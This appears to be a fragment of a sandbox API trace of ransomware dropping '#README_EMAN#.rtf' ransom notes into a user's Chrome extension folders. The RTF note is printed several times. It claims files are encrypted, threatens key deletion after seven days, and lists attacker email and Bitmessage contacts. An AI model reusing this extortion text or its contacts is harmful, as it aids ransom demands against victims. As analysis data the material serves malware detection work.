}}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.051] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.052] CloseHandle (hObject=0x294) returned 1 [0285.052] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\#readme_eman#.rtf")) returned 0xffffffff [0285.052] GetLastError () returned 0x2 [0285.052] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.053] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.053] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.053] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 